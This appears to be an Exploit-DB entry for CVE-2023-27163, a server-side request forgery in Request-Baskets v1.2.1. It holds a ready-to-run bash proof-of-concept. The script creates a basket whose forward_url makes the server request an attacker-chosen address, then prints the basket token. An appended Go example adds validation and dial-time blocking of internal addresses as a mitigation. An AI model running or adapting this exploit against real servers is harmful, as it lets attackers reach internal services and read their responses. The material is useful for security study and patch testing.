

[webapps] Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
source link: https://www.exploit-db.com/exploits/51675
# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Request-Baskets v1.2.1
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163
# PoC
#!/bin/bash

# Print usage when fewer than two arguments are given or help is requested.
if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
    help="Usage: exploit.sh <URL> <TARGET>\n\n";
    help+="Arguments:\n";
    help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
    help+=" TARGET";
    echo -e "$help";
    exit 1;
fi

URL=$1
ATTACKER_SERVER=$2

# Make sure the base URL ends with a slash.
if [ "${URL: -1}" != "/" ]; then
    URL="$URL/";
fi;

# Random six-letter basket name and the API endpoint that creates it.
BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");
API_URL="$URL""api/baskets/$BASKET_NAME";

# Basket settings: forward_url is the address the server will request.
PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";

echo "> Creating the \"$BASKET_NAME\" proxy basket...";
if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
    echo "> FATAL: Could not properly request $API_URL. Is the server online?";
    exit 1;
fi;

BASKET_URL="$URL$BASKET_NAME";
echo "> Basket created!";
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";

# Show the basket token; fall back to the raw response body when jq is missing.
if ! jq --help 1>/dev/null; then
    echo "> Response body (Authorization): $response";
else
    echo "> Authorization: $(echo "$response" | jq -r ".token")";
fi;
exit 0;
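
The PoC relies on the server requesting whatever address `forward_url` names. One way to constrain that field, written in Go as an added example (this is not code from Request-Baskets or from the exploit author): a check on the basket-creation body plus a connect-time check on the address actually dialed. `CheckBasket` and `DenyInternal` are hypothetical names, and the sample body in `main` is constructed.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"net"
	"net/url"
	"syscall"
)

// internalIP reports whether ip is loopback, private, link-local or unspecified.
func internalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()
}

// CheckBasket vets a basket-creation body: forward_url must be http(s) and not an internal IP literal.
func CheckBasket(body []byte) error {
	var cfg struct{ ForwardURL string `json:"forward_url"` }
	if err := json.Unmarshal(body, &cfg); err != nil {
		return fmt.Errorf("bad basket config: %w", err)
	}
	if cfg.ForwardURL == "" {
		return nil // no forwarding configured
	}
	u, err := url.Parse(cfg.ForwardURL)
	if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
		return errors.New("forward_url must be an http(s) URL")
	}
	if ip := net.ParseIP(u.Hostname()); ip != nil && internalIP(ip) {
		return errors.New("forward_url names an internal address")
	}
	return nil
}

// DenyInternal is a net.Dialer Control hook; it sees the resolved IP:port, so hostnames that resolve inward fail too.
func DenyInternal(network, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if ip := net.ParseIP(host); err != nil || ip == nil || internalIP(ip) {
		return errors.New("refusing to dial " + address)
	}
	return nil
}

func main() {
	body := []byte(`{"forward_url":"http://127.0.0.1:80/","proxy_response":true}`) // constructed sample
	fmt.Println(CheckBasket(body), DenyInternal("tcp4", "203.0.113.10:443", nil))
}
```

Set `DenyInternal` as the `Control` field of the `net.Dialer` behind the forwarding HTTP client; the creation-time check alone does not cover hostnames that resolve to internal addresses.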